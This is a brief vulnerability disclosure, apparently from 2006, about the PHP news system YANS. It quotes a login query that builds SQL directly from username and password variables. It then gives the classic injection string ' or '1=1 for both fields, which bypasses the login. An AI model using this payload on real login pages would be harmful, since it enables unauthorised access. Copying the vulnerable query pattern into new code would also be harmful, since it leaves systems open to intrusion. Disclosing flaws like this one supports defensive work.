|
Wednesday, 08 November 2006 |
Product: YANS (yet another news system)
Link: http://sourceforge.net/projects/yans/
vuln code:
$resultado = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'") or die (mysql_error());
simple sql injection
' or '1=1
' or '1=1
-navairum |
